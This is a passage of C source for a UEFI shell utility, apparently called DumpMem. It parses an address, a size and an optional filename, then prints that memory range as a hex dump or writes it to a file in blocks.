GetArg(VOID) { 52 | EFI_STATUS Status; 53 | EFI_SHELL_PARAMETERS_PROTOCOL *ShellParameters; 54 | 55 | Status = gBS->HandleProtocol(gImageHandle, &gEfiShellParametersProtocolGuid, 56 | (VOID **)&ShellParameters); 57 | if (EFI_ERROR(Status)) { 58 | return Status; 59 | } 60 | 61 | Argc = ShellParameters->Argc; 62 | Argv = ShellParameters->Argv; 63 | return EFI_SUCCESS; 64 | } 65 | 66 | static VOID ShowHelp() { 67 | Print(L"Dump memory by address.\n"); 68 | Print(L"\n"); 69 | Print(L"DumpMem [address] [size] [filename]\n"); 70 | Print(L" address example: 0xff000000\n"); 71 | Print(L" size example: 0x1000\n"); 72 | Print(L" filename example: dump.bin\n"); 73 | Print(L"\n"); 74 | Print( 75 | L"If filename is not specified memory is printed as hexadecimal dump.\n"); 76 | } 77 | 78 | static EFI_STATUS WriteByBlocks(SHELL_FILE_HANDLE DumpFileHandle, 79 | UINT64 Address, UINT64 DataSize, 80 | UINT64 BlockSize) { 81 | EFI_STATUS Status; 82 | UINTN WrittenSize = 0; 83 | UINTN BlockCount = 0; 84 | UINTN LbSize = 0; 85 | UINTN i = 0; 86 | 87 | if (!BlockSize) { 88 | Print(L"Block count is invalid\n"); 89 | return EFI_INVALID_PARAMETER; 90 | } 91 | BlockCount = DataSize / BlockSize; 92 | LbSize = DataSize % BlockSize; 93 | 94 | for (i = 0; i < BlockCount; i++) { 95 | Print(L"Current offset: 0x%llx\n", Address + WrittenSize); 96 | Status = ShellWriteFile(DumpFileHandle, &BlockSize, 97 | (VOID *)(Address + WrittenSize)); 98 | if (EFI_ERROR(Status)) { 99 | Print(L"Failed to write block %d\n", i); 100 | return Status; 101 | } 102 | WrittenSize += BlockSize; 103 | } 104 | 105 | if (LbSize > 0) { 106 | Print(L"Current offset: 0x%llx\n", Address + WrittenSize); 107 | Status = ShellWriteFile(DumpFileHandle, &LbSize, 108 | (VOID *)(Address + WrittenSize)); 109 | if (EFI_ERROR(Status)) { 110 | Print(L"Failed to write remaining data\n"); 111 | return Status; 112 | } 113 | } 114 | 115 | return Status; 116 | } 117 | 118 | static EFI_STATUS DumpMemToFile(UINT64 Address, UINT64 DataSize, 119 | CHAR16 *Filename) { 120 | EFI_STATUS Status; 121 | SHELL_FILE_HANDLE DumpFileHandle; 122 | 123 | Status = ShellOpenFileByName( 124 | Filename, &DumpFileHandle, 125 | EFI_FILE_MODE_READ | EFI_FILE_MODE_WRITE | EFI_FILE_MODE_CREATE, 0); 126 | if (EFI_ERROR(Status)) { 127 | Print(L"Could not open file %s\n", Filename); 128 | return Status; 129 | } 130 | 131 | Status = WriteByBlocks(DumpFileHandle, Address, DataSize, BLOCK_SIZE); 132 | 133 | if (EFI_ERROR(Status)) { 134 | Print(L"Could not write file %s\n", Filename); 135 | } else { 136 | Print(L"Done\n"); 137 | } 138 | ShellCloseFile(&DumpFileHandle); 139 | return Status; 140 | } 141 | 142 | EFI_STATUS 143 | EFIAPI 144 | UefiMain(IN EFI_HANDLE ImageHandle, IN EFI_SYSTEM_TABLE *SystemTable) { 145 | EFI_STATUS Status = EFI_SUCCESS; 146 | 147 | CHAR16 *AddressStr; 148 | CHAR16 *SizeStr; 149 | CHAR16 *Filename; 150 | UINT64 Address; 151 | UINT64 DataSize; 152 | 153 | // 154 | // get the command line arguments 155 | // 156 | Status = GetArg(); 157 | if (EFI_ERROR(Status)) { 158 | Print(L"DumpMem: Error. The input parameters are not recognized.\n"); 159 | Status = EFI_INVALID_PARAMETER; 160 | return Status; 161 | } 162 | 163 | if (Argc < 3 || Argc > 4) { 164 | ShowHelp(); 165 | return Status; 166 | } 167 | AddressStr = Argv[1]; 168 | SizeStr = Argv[2]; 169 | if EFI_ERROR (ShellConvertStringToUint64(AddressStr, &Address, TRUE, FALSE)) { 170 | Print(L"Can not convert address\n"); 171 | return Status; 172 | } 173 | if EFI_ERROR (ShellConvertStringToUint64(SizeStr, &DataSize, TRUE, FALSE)) { 174 | Print(L"Can not convert size\n"); 175 | return Status; 176 | } 177 | 178 | if (Argc == 3) { 179 | Print(L"Address: 0x%llx, size: 0x%llx\n", Address, DataSize); 180 | HexDump(2, (UINTN)Address, (UINTN)DataSize, (VOID *)Address); 181 | return Status; 182 | } 183 | if (Argc == 4) { 184 | Filename = Argv[3]; 185 | Print(L"Address: 0x%llx, size: 0x%llx, filename: %s\n", Address, DataSize, 186 | Filename); 187 | DumpMemToFile(Address, DataSize, Filename); 188 | return Status; 189 | } 190 | 191 | return Status; 192 | } 193 | --------------------------------------------------------------------------------